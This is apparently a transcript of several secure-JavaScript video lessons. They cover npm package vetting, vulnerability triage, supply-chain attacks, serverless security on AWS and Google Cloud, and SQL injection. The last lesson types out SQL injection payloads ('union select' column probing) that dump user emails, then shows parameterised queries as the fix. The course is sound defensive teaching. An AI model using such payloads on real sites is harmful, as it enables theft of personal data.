And Sharp will only be here to convert images. But let's say we don't really mind. Now the next thing we need to do is to compute health metric about the package. So here we see that issues are answered pretty quickly by the owner, so that's a good thing. We'll have the same thing on this one. Yeah, actually, it has a pretty decent time. Don't forget that open source maintainers are not paid to do support for you, so a week of response is actually an acceptable time. So the next thing we will do is actually check their package cost. So I use this site named nvaca. It's really helpful because it tells you already a lot about the complexity of the dependency tree of a package. So right now I have asked nvaca, npm nvaca to check about the dependency tree of both packages. So for instance, for Sharp, we've got 80 dependencies with a lot of maintainers. The good thing is that some of them are like highly popular Node.js people the Node.js community trust. You have Isaac, founder of NPM, Feroz, who made standard, Matteo Colina, who created Fastify, Tutal, Nate, and Substack are great coders too. Kat Machin is a great dev at Microsoft. TJ Oleg was the original author of NPM. Adam Baldwin was the security person of NPM. Ahmad was the CTO of NPM. Forrest Novel was seasoned engineer. Nathan LaForestier worked for NPM. Rui works for NPM. There's a lot of dependencies that are actually handled by people who are trusted in the Node community. Is that true for this one? Yeah, pretty much. We've got some similar usual suspects. Some people we know, some people we don't, but we can check about them. Okay, so regarding who maintains them, statemate. Regarding licensing, we see that we've got one node that has no license, so that might be a bit complicated. And this one has 72 nodes, meaning 72 dependencies. So once again, both of them are on the same range in terms of how many dependencies they bring, which means how many security structure problems they might bring. The interesting thing is that we see that there are some official Node.js packages here, which are Node add-on APIs. So I suspect that Sharp actually has C++ code and GIMP does not. So that's another interesting thing in terms of security. It means that Sharp can do any syscall it wants through the C++ extension, whereas GIMP is limited by the Node API. So right now there is 1 point for GIMP against Sharp, because Sharp does have a native add-on, and I assume that if I click on package.json, I will have an install script that actually does node zip and install a local and build a local version of the C add-on. So right now, for me, it's a pretty compelling argument in terms of security, because what happened in the JavaScript VM is actually constrained by the JavaScript VM, and what happens in a native add-on is actually, I mean, you have no limitation, you have no except by reading the code of the code in C++, you have no expectation of what it actually does on the machine because it's native code. So far, right now, I would probably be leaning toward using GIMP because of the native add-on. But now I haven't started using my secret weapon yet. So let me clear my browser and we will use a tool that's named nsecure. npm install. Probably I should zoom in the terminal for you. nsecure. That's actually a pretty new but handy tool built by some French JavaScript community, and they are literally obsessed with understanding what they install on their machines. So if you install nsecure, now you've got the nsecure command available on your machine, and you can do nsecure from, and let's start with sharp. And what it will do is it will download the code for sharp by analyzing the tables, and it will run static analysis on this. And now we want to do nsecure open. It opens a new window in the browser. This looks a bit like Avast stuff, but the good part is that it has security enrichment. So we can check the extensions for all the files in this thing, so we can identify quickly, hey, for instance, there is at least one module that has an issue in the way they handle temporary file. We've got some other extensions. The licensing part makes sense. Okay, that's okay. So now we can see that all the modules have small emojis, and we can actually ask for the emoji list. So for instance, everything I told you, for instance, is duplicated. You know that the module is duplicated. It means that the module is twice in the dependency tree, but you might have this little clock, and this little clock actually means that it is an outdated version of the module that is used. And you have actually this bird's eye view of everything that you're bringing. You even have the bundle phobia stats, so you know how big of the size it will take locally. So if we go back to the global stats, it has also package with indirect dependencies. It highlights which packages have native add-ons, which packages are dead according to them. They have not been updated in 1 year. They will also tell you, I don't know if we have that in the example, if a package has unmet dependencies or unused dependencies because it does static code analysis, but it will also check for certain static stuff like problematic regex. So if I click on this one, I have one warning, and the warning is actually one unsafe regex. And if you have followed the course about regular expressions, you know what it means. So if you want to go directly, you can actually click on the link here, and it will bring you to the page of code so you can immediately find it. So what I miss in this tool, and I told Thomas, is that I would like a high-level, first-hand knowledge about what I'm doing. So now that we have studied sharp, let's do the same about GIMP. So we do a from GIMP analysis. It's downloading everything, doing static analysis on everything, and now we do an open. It has overridden the value of the local file. Actually, if you check the content, there is a nsecure.json file that actually contains all the finding, so you have a static way of using that. So let's go back to open, and now what do we have? Global stats. We've got the number of package. We see that it has extensions for fonts, for instance. Licensing, we've got one unknown license, so that might be questionable. Let's see, why is this package having rough time? Okay, bad example, this one. This one has 8 warnings. that are actually issues but in the tests. So as you can see, everything is in the test, so we can actually safely ignore that. You see that, for instance, this one is maintained by 2 people. Okay, it's in runtime.js and it has an unsafe statement. So let's inspect. Okay, it has a function, cool. So if you have watched the video about code injection in JavaScript and XSS, you know what this is. So this tool is actually very handy to give you a quick bird's eye view of what's happening in your module. That's it for this video. I hope I help you make better and safer choices with your NPM packages, and see you soon in another video. Hello and welcome to Secure JavaScript Programming with Vladimir the Turkem. In this video, I will answer the long last question. What should I do if npm, yarn, or even GitHub tells me that I have a vulnerable dependency in my app? We will follow 4 simple steps that will enable you to know how to react, what to do, and how to mitigate. So let's create this doc, steps.md, so I can keep track of what I'm telling you. The first item, which is probably the 0em1, is knowing about the report. So in our case, we've just have run npm install, and we see that we have 3 low severity vulnerabilities. To know details about them, well, we will just obey what the computers tell us to do, because computers, and we'll type npm audit. It takes a few seconds, and now it tells us, okay, so you've got clean CSS in an older version than 4.1.11. And this version is actually vulnerable to regular expression denial of service. If you don't know what denial of service is, in this learning track, there is actually a course about regular expression denial of service. Basically, long story short, that's when there is a bad regular expression that can take a lot of time to compute and will block the JavaScript main thread. So, how do we know what to do from this? Well, the first part, after we know about the vulnerability, is to read the report. The report is actually the advisory here in our shell. It could come as a line in continuous integration. It could be the output of a vulnerability management tool like Snyk, but it will always tell you to read more, click there. So let's click. It opens Google Chrome on my computer and takes us to npmjs.com advisory 785. Version of clean CSS prior to 4.1.11 are vulnerable to regular denial of service. Readers untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive and therefore leading to denial of service. Remediation, well, update. Okay, so the interesting part is that it doesn't tell us how to exploit it. So we have a challenge of knowing whether or not we are vulnerable. We have read the report. Now we want to go to the next step, identify impact. And to identify impact, the first part is to see why do we have clean CSS within our app. So npm ls, then the name of the package. And now npm told us that because we are running purg 2.0.0 beta 11, that's dependent on purg filters 2.1.5. This one is dependent on a vulnerable version of clean CSS. Okay, that's a bit problematic. The issue is we can't for sure call fix false because as npm tells us, it will change the version of pug that will be out of our dependency range. I created this app using the Express app creator, and the version of pug is actually hard-coded. I have limited doubts on the fact that just upgrading pug is enough to fix the issue, but for the sake of the demo, let's not do it right now. So now we have identified where is the module here. Now we need to identify the impact. Well, to identify the impact, we need to understand the vulnerability. So, because there is no example of exploit for it, the only thing we can do is to go read the commit by Jamie Davis and tell us that and check what's vulnerable in it. So here you've got update, you've got a function, okay. I'm a bit lazy and I don't want to go deep into understanding how this works. But where we are lucky is that there is a unit test. And that's actually really helpful. They created a unit test to check if the vulnerability is present. So what we can do first is actually copy-paste the unit test locally and make sure that our current version of the module is vulnerable. So I just create a test.js file and I copy paste the unit test. And of course, I have to import the module. And now if I run this file, it will take a few seconds to run. That's actually expected because the vulnerability is a regular expression DOS, and as you check the test, the assertion of the test is that the time spent is less than a second, and in that case this took much more than a second. This took like 6 or 7 seconds to run. So we know for sure that our library, the one that's in our project, is actually vulnerable. Now that we know it's vulnerable, we also can dig into understanding which part of the code is vulnerable. And if you have an IDE, you can dig into that. So let's do a method I use to identify method, which is actually doing this. Here we've got minify, and we can see that it's called. So I assume that run minifier, okay. So what we know is that we can break down the thing. Let me show you what I mean. Calling the constructor clean CSS does not bring the vulnerability. Calling minify does. So to prove it to you, I run this code, it fins immediately. I run this code, it takes ages to run. So now we have identified which method in the code is actually vulnerable. I usually always do evaluate expression and jumps to source when I want to make sure. So what we know is that this function is vulnerable. So we will modify it temporarily. We will not fix it, but we will log if it is executed. Now, if I run my test, Here you can see I've got minify called, and I actually logged a new error because it gives us the stack trace. So in the case of that actually being triggered, we would have the stack trace to know which code paths are actually calling it. Now we need to start the whole project because we know that we have a vulnerability in our app, but we don't know if it is in a code path that is used by our app. So let's try it. If you have unit tests that have 100% coverage, it's even better. But if I check the logs here, I don't see my error message. So I can assume that my app is not vulnerable to it because I did not find any way of running this function. A good next step then is to say we are not vulnerable. Once again, the best way to know that is to have code coverage in test, so you are sure that the whole code is tested for this vulnerability. You can even throw an exception here. And if you do that, when you run your unit test, you will see one test failing or not. If they fail, that's because this code path was called. Let's say that this code path was called. Let's say that we are in a case where we were vulnerable. The next thing to evaluate is to understand what parameters are passed to input. If they are always static parameters hard-coded in the app, maybe it's impossible for this vulnerability to trigger for real because we never code it with the malicious inputs. If it is called with code that can come from the outside of the app, whether it's read on a file or get on the network through an HTTP request, then we are in big trouble and we need to fix. So if I go back to my step, if not impacted, then you are good. If impacted, plan for fix and understand what inputs get in this path. And last step, when you have done that, you pretty much know how to react, if you have to fix immediately or not. Plan for update. Updating a component might take a lot of time depending on how important it is in the app. So maybe if you are not directly vulnerable into your app, you want to plan for update later. Well, I hope this helped. Let me know, feel free to contact me. And until then, I hope you enjoyed this video and let's meet very soon again. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will talk about supply chain attacks. Okay, so in the usual world, an attack, a computer attack, will usually happen against a running system. Someone will try to hack into a web applications, into a web server, at the operating system level, at the network level. However, now more and more applications are relying on third-party libraries to be built. That's especially true in JavaScript, but that's also very true in Java or Python. These third-party modules actually open a new surface for attacks, because attacking your supply chain, attacking what brings those libraries to you, is actually a way to attack either your own developer machine, your laptop, or to attack your production application. Let me just put myself back because it froze. So in this video, we will go in depth about how one can try to attack not your application directly, but attack you or your application through the modules you use. So there is already a very fun attack to do, which is called typo squatting. I'm never sure how many P's to put to typo. So typo squatting, let's say you want the express module. And when you do npm install, you mistype and you type express or express or expre. Well, all variants for express could be registered by someone who would put a malicious module that would have the same signatures as the express module. Which means that if you have sticky fingers, or if someone who writes the modules you use has sticky finger, you will download the wrong module and you will get something potentially malicious. Then that one is already pretty bad and necessitates you to rather copy paste the name of modules from npm rather than actually writing them. So just click here and it's copy pasted and you are safe. So that's the first way to defend. We've got typo squatting, but we can have rogue module owners. So a rogue module owner can be someone who legitimately owns a module you use. So a while ago there was a module about electron management. I don't remember exactly what he did. But when the author of this module realized that their module was used by a desktop application for cryptocurrency management, well, what they did is they published a new version of their own module with a backdoor to steal cryptocurrency. From faithful to unfaith. And to protect yourself against that, usually the best way is to make sure that you're using modules with multiple maintainers. If you've got a single maintainer, they will have all power on the module you're using. So the more popular the module you use, the more maintainers, and the less likely they are to break things arbitrarily, because they will have people watching what they do in the repository. Well, there is still another way to attack, and it will be the compromised owner model. So there's actually a very interesting story, is that in 2018, ESLint has been vulnerable to such attack. So what happened is that someone compromised the npm account of an ESLint maintainer, any of them. And that's pretty much the opposite of what I said. Previously I said a lot of maintainers saves you, a lot of maintainers also raise the size of the attack surface. And they published a malicious version of ESLint scope and a malicious version of ESLint config ESLint. On install, these would actually download a script from a paste bin and try to copy the content of your .npmrc, which contains your npm credentials, and push that to a remote server. The fun part is that the hacker did not understand the stream model of Node.js. So they were downloading the payload, but calling immediately eval on the first chunk of data coming from the attack payload, which was truncated because Node.js downloads files from a remote location in chunks. And then he passed the first chunk directly to eval, so it crashed. It just crashed. And actually, the original issue was... Is there a link here? The original issue is due to that. Someone realized that they had an unexpected fn of input and an issue running code. Here is the code of the vulnerable thing. So you see, they get the first chunk and they push it to eval immediately, which actually crashed because the code was not full. And that's how the vulnerability was discovered very quickly. So if you read the postmortem, you realize that they on the 12th of July 2018 at 9:50 a.m. the issue, the malicious module was published. Then they republished something 1 hour later, and 30 minutes later, 35 minutes later, it was known, and the malicious payload was taken down from Pastebin 10 minutes after that. So likely not much people have been compromised, but what happened is that NPM actually revoked all tokens generated before that date. So we published an advisory at Screen saying you should revoke your tokens, but that's what NPM already did for everyone. Also, we published a recommendation to unpublish these versions should you have a mirrored version of that, but we will come to that right after. So what you need to understand is that, well, open source maintainers have lives too and can be compromised. See ESLint issue. So in that situation, well, not updating is the right thing to do. Don't update immediately and make sure you check any weird errors and be very conservative on what happened. Okay, now usually the one of the solutions for these things is to have an npm proxy. So if you've got Verdaccio, which is an npm proxy that actually enables you to have your own private npm, and when you download something that is not on Verdaccio, it will look up to npm to check if it exists. So if you want to install that in your production, in your enterprise, that's probably a good idea. That will enable you to be less dependent to npm, to make sure that if a module is unpublished, you will still have access to it. So it's actually pretty powerful. However, because it proxies to npm, recently a security researcher has found a way to attack this. So let's say that we've got a module named A version 1.0.0 on npm.js.com module. And now we've got a Verdaccio which has cache. So let's do, we also have on our own Verdaccio. So we have a copy of it, and that's the initial state. Now let's say that for some reason a event A gets unpublished from npm.js.com. So we are good because we still have a cache locally, but it's not available anymore. NPM has a protection for the attack I'm detailing, but it can somehow be bypassed if you social engineer NPM team. Then, malicious event, it gets republished by someone npm.js.com version 1.1.0. So what happens is that we still have the version 1.0.0 on our own Verdaccio. So if we do npm install a at 1.1.0, then the resolution algorithm will do, okay, is that on Verdaccio? No. So Verdaccio will get it from npm and cache it in 1.1.0. But once again, we don't know who republished a on npm.js.com. And because of that, they can be a rogue module user. It's a kind of abundant resource squatting. So npm has a protection against that, which means first of all it's really hard to remove a module from npm. If you publish something on npm, you actually have only 24 hours before you can remove it. Then when a module has been removed, npm does not allow to republish over it, so you need to contact them and you need to have their agreement to republish over it. So what is the impact for all of this? For all of these attack means that we have seen one by one, the impacts are either to attack the final application built with the modules or the developer's workstation. So in the case of the ESLint thing, if you followed the video about npm's secret, which was the first one of this course, you know that you must use npm install -- production in production environments. That is because you don't want to have a bigger attack surface than necessary through dev dependencies. So there is no reason for ESLint to be on a production server. It must be only on developer workstation. And that's why it makes sense for someone that can corrupt ESLint to actually attack developer workstations. In the case of the rogue module owner, they were not attacking web applications, they were attacking Electron applications built with the module they identified as used by a crypto wallet Electron application. And for typo squatting, well, it depends on the module. You can compromise the module used for Express, but you can even do more with cookie parser or any cookie management or authentication management library. Once again, if you check my video about how to choose the right npm module, Secure should tell you about your own package and let you know exactly which modules you have access to what and which situation you are in. Thanks a lot for watching this course and all the courses about NPM security. I hope you learned things. The NPM ecosystem is not more dangerous than other ecosystems. All of these attacks also happen outside of the NPM world, but NPM world is so vast that this happens there. If you download things through CDNs or directly through URLs, you will have pretty much always the same issues, with the main difference is that you won't have NPM, therefore GitHub, therefore Microsoft, having people checking that there are no malicious packages on the repo. You will be on your own downloading stuff from the internet. That's why Dino is a highly unsafe piece of software, and they are claiming being a secure application runtime for TypeScript is JavaScript is a marketing allegation that I don't want to call a lie, but I guess you understood what I'm trying to say here. So stay with NPM. NPM is the safest you can get in the JavaScript world. Thanks so much for watching this video, and let's meet soon again. Hello and welcome to Secure JavaScript Programming with Vladimir de Turkheim. In this video, we will do some refreshers and introductions to serverless JavaScript. Serverless JavaScript is still pretty new. It's this concept that the server where running server-side code can be fully abstracted. So historically, when you run a JavaScript code, a JavaScript node server, you run that, well, on a bare metal server or something like that. Then comes container as a service, where instead of handling the host directly, you would provide a container and there will be a hosting solution handling that for you. As a higher level for that is platform as a service. So for instance, one of the big leaders of that is Heroku. Heroku, where you just provide your code base and you can actually link a GitHub repo and Heroku will know what to do with that. And you can have your database or things like that already handled. But there is still a server. Heroku uses Linux container technology under the hood and instantiates your code in a server. Well, there is a server in serverless. It's just so abstracted that you don't have to handle it. The idea with serverless is, can a cloud provider give you all the bricks you need to build an application without thinking about ops at any time? So instead of thinking about having a database, you would get a cloud storage. And they might even, if you're using things like Firebase, they might even handle the authentication part for you. You need a real-time database, yeah, Firebase provides that for you. If we go to Google Cloud Engine, they've got a lot of system available. If you need to run applications, if you need to run a Kubernetes instance, or if you want to run databases and you don't have to think about the databases, they will handle that for you. Same thing for AWS. They actually have storages, so if you need a file system, you got one, and databases system. So what's interesting with AWS and Google and Microsoft is that even if they provide their own database software, such as DynamoDB for one, SQL BigQuery for the other, well, it's still possible for you to get plain owned old databases but handled by the cloud provider. So you don't need to do the ops on the server, but let's say you really want a MySQL database or Postgre or Oracle, well, you can actually ask AWS to handle the creation and the administration of the database for you. And you won't have to update the server, the base server, things like that. So you already abstract a lot of services. And the next level that was actually coming was, can they abstract the architecture of your application? So instead of providing a full application, you can provide functions. I will have a personal warning. I don't think serverless is fit to replace monoliths. It's actually very great when you did some certain resources with a lot of scaling for certain features, for certain functions. Let's say you have a file uploading system and you want to check for viruses in the files. Well, Pushing your file upload to S3 through a Lambda to do the antivirus check is actually a great idea. Replacing your Express backend with AWS Lambda is counterproductive because functions have a cold start program. So if you want good performances, you need to make sure that they have a heartbeat to survive. So you end up with productions where people just have a cron tab that do requests toward functions to make sure that they don't cold start, because when they cold start, they have to restart the whole environment. Also, in my personal opinion, it's actually not very smart to use Go or Node.js with AWS Lambda or any function as a service provider. Why is that? Because Node.js has been designed to handle multiple requests in a single thread. And apart from Google, most situations where you write functions will not share the same thread for multiple invocations, and you will have multiple processes per invocation. So you will end up either in a very weird situation where you don't know to debug multiple elements in a single process because there will be side effects between two transactions in the same function, or you will use the whole interest of using an asynchronous server-side runtime. Okay, that was for my old-timer ranting about that, and my troll saying that if you want one thread per request, you can use PHP, which is a great language. So what are the most popular serverless technologies in terms of function as a service? Well, Firebase is really popular, especially across mobile development teams. Cloud Functions is the Microsoft solution. AWS Lambda is the flagship product of the serverless generation. If I'm not mistaken, they were the first to bring that to large scale. And of course, Microsoft has solution for that on Azure Cloud. And as of everything on Azure Cloud, it probably has a very good user experience, but I'm less familiar with this one. In this video, we will focus on Google Cloud Engine and AWS Lambda. So let's go through the process of creating a Lambda in AWS. Well, you just create function. Let's do create from scratch, my JS function. And then here, they ask you about the runtime you want. You can run .NET Core, Go, Java, Node.js. You can notice that in the latest supported, you have one Node.js, but you have also other supported with Node.js 10 and 12. Well, you need to make sure if you use outdated versions of the runtime that your cloud function provider provides patch for the vulnerabilities that might happen in the versions. So I don't know how accurate this is, but in the past, I have met a lot of situations where function as a service provider did not have patches for vulnerabilities in Node.js, and actually you could not do anything else than going on with the versions they gave you. Hopefully that was in the past, and now you can also provide your own runtime for AWS Lambda, which is basically providing a container image, and you can choose your version. So let's use Node 14 because that's the latest version, and here is the permission part. As this is a cloud technology, everything must be linked with permissions because a Lambda and a function runs within the scope of your cloud organization, meaning that it might have side effects and it might have access to the API of AWS with high privileges if poorly configured. So you need to audit and make sure that you're not giving the rights to your function to actually create other functions, create storage, leak things, or even worse, create user on your AWS organization. One of the main security issues with serverless is actually role authentication. So here we will use the blueprint with basic Lambda permission, and we will expect AWS to provide us the right thing. And let's not go to advanced setting, and I have to move my, my video feedback because I was hiding the button even on my own screen. So now we wait, and we wait on the very user-friendly interface for AWS Lambda. If you have already played with that, you know what I'm talking about. And we've got the function designer. So because it's a JavaScript function, one of the questions is how do you trigger it? And there are multiple ways to trigger the function. For instance, it can come from a load balancer. It can come from code commit if you're using Git on AWS. It can come from a Kinesis worker, or it can be an event from S3 or something in a queue SQS. And there are also other partner things. However, if you want to turn an HTTP call into a function call, what you want to do is API gateway. You want to say that it is an HTTP API. Because we are terrible here, we will open it to the world. We have the name, and we can add the trigger. And once again, we wait for AWS Lambda to provide us what we want. That's why usually, because of all these caveats, it's actually recommended to use scripts to generate all of that infrastructure as code, because you can reuse code and you can make sure that you don't spend too much time configuring stuff because it has reusable code. Okay, and now we've got an editor. Of course, we can upload a function from code, from a zip file, or from AWS S3. There is no direct Git integration, but I already wrote a piece of code where here, in the case of AWS Lambda, you actually have an abstracted event. So let's do just a log function, and then that respond with the event. Up, test. Okay. I'm probably again in front of the table. And now it failed. Why did it fail? Unexpected token 2. Of course, I forgot to put a comma. And here we have the result, the response. It's as if it forgot to take my edits. Okay, I'm not exactly sure why it did not work as I wanted, but here it's deployed. And now we should be able to access our API through this. And let's click on the link, and we have the result. And that is actually the event that is passed to the function. Because if you remember the code of my function, it's about responding with the event. If I can find it, here it is, responding with the event. So what's interesting is that AWS have abstracted in a standard way, but their own standard way, what an HTTP request is, and it's abstracted into this event thing. As you can see, I have nowhere to see my logs, and that's actually because I miss a logger service, and I'm not exactly sure how to do that right now because that's actually one of the monitoring. And you can monitor the things, but you can also push the logs to AWS log service, and that's become even more complicated. So in terms of UX, AWS is interesting because they abstract the HTTP request. If we go on the Google side of the things and create a function there, let's use the default names, and because of my accent, you probably know that I am not in the US. Here you see that the trigger part is less complex than AWS. It's less complete, but it's also less complex. So let's just put HTTP. We want it open and we want to require HTTPS. They create us a URL. If we go there, they tell us that there's nothing there because it hasn't been created yet. And that's the interesting part. So right now, by default, they give you an outdated version of Node, but you can probably update. You have a notion of entry point where you can actually have choose the name of the thing where you get in, and you've got a package.json. And actually, when you create an AWS function, a Google Cloud function, you need to enable a build system because there will be a package npm install build item by default here. The other interesting part is that actually they tell you that this is pretty much the same thing as an express middleware. You've got a rec and a res object that implement the same API. And we don't really care if that's a post or a get endpoint. We will just say that it will by default do message and otherwise return the message we want. So now we just want to wait for the function to be instantiated, and if you were amazed by Google going fast compared to AWS in creating the object, well, you can consider that it might take more time. Okay, I probably messed up something here. That's embarrassing. So the log part is actually very easy and more straightforward. You can see that the log are already available here, and that Google actually has a more streamlined but less complex UX here. Okay, here we are. And if I put message equals hello infosec, it writes hello infosec because our cloud function is deployed. Once again, you have seen that in that case there were less things to worry about because the permission things was by default limited and it doesn't have access to my cloud organization, unlike what might happen in AWS, which is a much more complex cloud solution. So it was a very dense video, but I have the feeling that going one full course about AWS Lambdas without, or serverless in general, because I might use a lot of Google in this course, without introducing what serverless is and how it works, might not be the most accurate way to go. Also, if you want to simplify your serverless development, you can definitely use this serverless framework, which is a partner of AWS Lambda, a technology partner of AWS Lambda, and they actually already have pre-built scripting for deployment, making the pain of creating a Lambda much lower. Thanks so much for this video. See you soon when we will get in depth about serverless security. Have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkhem. In this video, we will be talking about the security best practices when having a serverless Node.js application, a serverless JavaScript application. So there are a lot of best practices in terms of code that are linked to vulnerabilities, but that we will see in another video, which is more designed toward Node.js security. In that one, we will focus about things that are typically linked to serverless and cloud deployments. There are actually two very important things you need to do. First one, even if all the cloud deployment platforms, all the cloud function platforms enable you to have an online IDE in the browser that you can use to build your code in. Never use that. Always have a project on a version control system, whether it's Git, SVN, or Mercurial, whatever you have to use, but never have something inside an unsafe storage in a browser that's on your cloud provider side. Second one, deploy cloud through CLI is not entirely true. So there is two else. Use infrastructure as code. Meaning that build your cloud setup as a code base with tools, some maybe like Terraform, and deploy everything through CI or CLIs, but never actually drag and drop things to S3 or drag and drop zips into an interface. That's actually very important because you need to be able, those two first items are here to help you save things if something breaks, if something disappears, if some hacker managed to get into your cloud instance. Well, because of these two items, you will be able to rebuild the system quickly rather than losing everything if someone just get access to your cloud infrastructure and breaks everything. That's why everything must be stored in a VCS and backed up. Last item regarding production is have secrets either in environment variables, most of the time that's okay, or if you can, and it might get expensive, use the cloud provider secret store. So in our case, we won't use the cloud provider secret store because, well, they're expensive. But they exist and there are services to manage secrets in your applications. Last but not least, regarding the lifestyle cycle of the project, well, test locally and in CI, and make sure that your deploy flow refuses to work if there have not been test session running. And when you test, use code coverage and things like that. So let's build, first of all, a simple function. We use a module named fastest Levenstein, and what we want to do is to deploy a cloud function on Google Cloud that will compute the Levenstein distance between two words. So let's get the first word. Word 1 equals rec.query.word1. So we are going toward an invocation like get /get/top word1 equals hello and word2 equals bar. So we'll do the same for word 2. And one thing that's often overlooked when doing Node.js programming is data validation. So first thing we need to do here is ensure that the type of the items we get is the one we expect. So you can use libraries like JSON validators or Joy. Joy is my favorite library for that. But right now it will be a bit overkill to use Joy just to check the value of two strings. But be aware that it can grow very, very, very quickly in complexity when you do data validation. So in that case, well, you might have to do something else. Okay, next item is what do we do when there is an error? Well, we do res.status. We send a 400 error, and now we will use return res.end arguments must be strings. I always return when I call res.end to make sure that there are no line of code that can be called otherwise. Even if I use else, it's called defensive programming, and that's actually a best practice. And in the other case, we will do res.end distance between word1 and word2. Okay, that sounds good. So now how do we deploy that? Well, if you remember well, I told you that we don't want to deploy through the interface. So we could totally go into Google Cloud Function, create a function, and copy paste everything. But we don't want to do that because we want to be able to rebuild everything. So if you're using the serverless framework, they will have scripts already populated for that. Otherwise, I would recommend that you keep your scripts inside the repository lifecycle. That's because sometimes you will need to update them and you want the developer to know about that. However, in certain situations, for instance, the project is dependent on staging or production. So in that case, you will need to make this part of the argument dynamic npm comment argument, and actually npm comment accept arguments. So to do that, you need to use the dash dash example. I don't find the documentation right now. Let's quickly check Stack Overflow. Yeah, that's the one. That's dash dash. So you will do npm run dash dash and then pass a parameter, and that can be added as a parameter to your script. So in our case, we likely want the project to not be a fixed parameter. But hey, you know me, you know that I'm usually very lazy in a lot of things. So now let's clear so I don't spoil what I already did, and I will just do npm run deploy. Another advantage of having the npm as an abstraction in front of your deployment or analysis script is that if you change your cloud provider, they will still work. Also, you notice that there are no authentication points in this. That's because the Google Cloud CLI already knows where to find my tokens, and well tried, but I won't show you them, on my disk. And when you get in CI, you will have to do secret management to provide them as environment variables if you want to deploy from CI. I've also created a second method that's called describe, and if we run it now, well, it will just tell us deploy in progress, but it will also give us the URL of the function. So here we can see that it already works. So if we do describe again, tell us that it's active, so the first command is over. So here we've got our error, and that's totally fair because we did not have word 1 and word 2. So let me add word 1 and word 2, and then well, that's not good. That's an error. I'm terrified. Okay, I'm kidding. We get a 500 error here. If I were good at acting, I would pretend that I am terrified, but that's actually a bug we placed in the code, and that's a Node.js security issue most of the time. So if we refresh, because we don't understand what the bug is, we can refresh the interface, and we can click on the function that has been created. Damn it, I have spent a lot of money on this. What we want to check is the logs, because we don't know why it failed. And when the log was displayed, we realized that I made a type error. And here we actually have a stack trace that is readable. And we see that the chunk argument must be a string, but we don't really have the details. But we see that we received a number. So the right way is to actually replay the inputs. But as you can see, they are not in the logs. So you will have to log the inputs if you want to be able to replay them. Of course, providing that they don't contain sensitive data. In our case, the mistake is that res.end actually expects a string, so I made this terrible mistake of providing a number. Right now, we can redeploy the function, and as you can see, the previous version is still active unless the new one is replacing it. So we just need to wait, and hopefully soon we will be able to write our Levenstein distance. Let me check my notes. While it deploys, I will show you where to put the variables. So as you can see, Google knows how to do environment variables for both, for building time and runtime, but it doesn't actually invite you to put them here. You will need either to go into edit and find the deeper stuff here. Either you will deploy them through CLI items. Actually, you never want to commit your environment variables. The code must be available and committed in a CVS, but the environment variable must never be shared on a server. So it's actually okay to have special jobs where you get the environment variables from secret store, or if you don't have the resources or it's too much complexity to use a secret store, actually just put them manually, but this won't scale. Use a secret store if you can. Okay, so now we know that it has deployed with a new version number. So if we refresh this page, well, it worked. So all of that has been demoed with Google Cloud Engine, but actually works really well with AWS Lambda. At one point, there is a massive difference between AWS Lambda and Google Cloud. It's about testing. If you want to do testing on Google Cloud, well, since those two objects are believed to follow the express/node core request and response things, you can actually just install any test runner. I really like tape, to be honest. I have to check the documentation most of the time, but it's like the simplest, most scalable test runner for JavaScript I know of. So let's just do this, add a test, new tests, up. Of course I want to make pretty code. Of course I have sticky fingers. Const distance equals require index. Up. Now we don't want timing, we don't want promises. What we want is t dot equal distance foo 1, and then we put a number of assertions. We can run this file, and it complains because we actually called it with the wrong arguments. So what we want to do is actually mock the object. So rec equals query. That's what happens when you don't think word 1 foo, word 2 foo. And now it's also important to create a response object and function rt.equal r1. And now instead of this we just do distance rec res, and it should work, and we have local tests that actually work. Okay, I failed on something, but that's now I want to know why. Yes, of course. You know why? It's again a type error, and this time I was not aware of it. So yes, we respond with a string and not with a number. One of the main issues is that for AWS Lambda, they don't comply with the Express interface, so you will have to use AWS Lambda Docker image. And they actually provide Docker images for you to use to actually test your functions locally if you don't want to run your unit tests in the cloud. That's it for this video about serverless best practices. In the next video, we will go in depth about a few things about Node secure coding. That is a must known in terms of secure programming with JavaScript on the server side, even if it's serverless. Thanks so much for watching this video. I hope you enjoyed it, and see you soon in another video. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will talk about injections in Node.js. If you build a serverless JavaScript application, you are very likely to use either a NoSQL or a SQL database to do things, maybe with files and maybe with shells. In this video, we will focus on string injections. If you are interested in learning more about MongoDB injections in Node.js, you can check the courses on that topic or dig into my conference talks that are all online on the topic. Injections are actually still the first element of the OWASP top 10 in terms of security issues. So if we check the top 10, the first one is injections. That's the single vulnerability that is considered as the most dangerous and impactful in the web application world. So now, because examples always work better, let's start with a SQL injection. Here I've got a website where you can access blog posts by their ID. However, usually when you see this kind of thing, when you can just change an ID and get a different content, here you've got the title, the content of the blog post, the first name of the author, the last name of the author, hackers will try to inject into it. So one easy way to start injecting is to do something like union select star from users. And here we get an error message. That's actually very interesting. That means that the injection works, but that we don't have the right number of columns. And that the SQL query we injected had two subqueries with different outcome of columns. So the thing to do in that case when you are a hacker is to count the number of entries you have in the dataset. So you've got title, content, first name, and last name, so 4. So we'll retry an injection with select 1, 2, 3, 4 from users. And here, as you can see, we've got a new record which has title 1, content 1, first name 1, last name 1. That means that we are going in the right direction. Now let's try to do first name, and we have much more data into it with a lot of first name and last name. That's actually dropping us the whole author collection. Maybe they have an email, and here you see I'm guessing with keywords, but in the real life you would be using a tool named SQLite that would actually run injections, sorry for that, SQL map. SQLite is a database that would actually run the injections for you and drop the content of the database and display the content of the database. So here we have started to leak the first name and the email of all users in the database. And that's actually very problematic because that's what's called PII, for personal identifiable information. Meaning that if this vulnerability happens and that EU citizens are impacted or California resident, well, you are in for big trouble because the legislative system has created a lot of penalties through GDPR and CPA for people who let personal information leaked. Okay, why is it vulnerable? Well, it's vulnerable because here we've got a SQL query and the parameter into it is actually concatenated. It's not what we call escaped. I will show you how it is done in a couple of minutes, but the parameter is actually concatenated, meaning that when I want to run for a single blog post, my SQL query becomes select all of that. I'm at the bottom of the screen. From post as post, then I join on the user table where post ID equals 1. And here is my injected part with email and first name being stolen from the user table. That's actually very problematic because in a select query, it's possible to union and therefore access other data. In queries that have side effects on the database, like writing or updating stuff, well, it will, or deleted, well, it will mean that someone can tamper with the condition and write arbitrary data in your database. So it's actually very, very, very bad. Hopefully, thankfully, there is one easy way to fix it. You take the parameter that has been concatenated and you replace it by a question mark. Here, in the call to the database driver, you pass it as a second parameter. And if you want to put other ones, you would pass them as extra parameters in this array. That 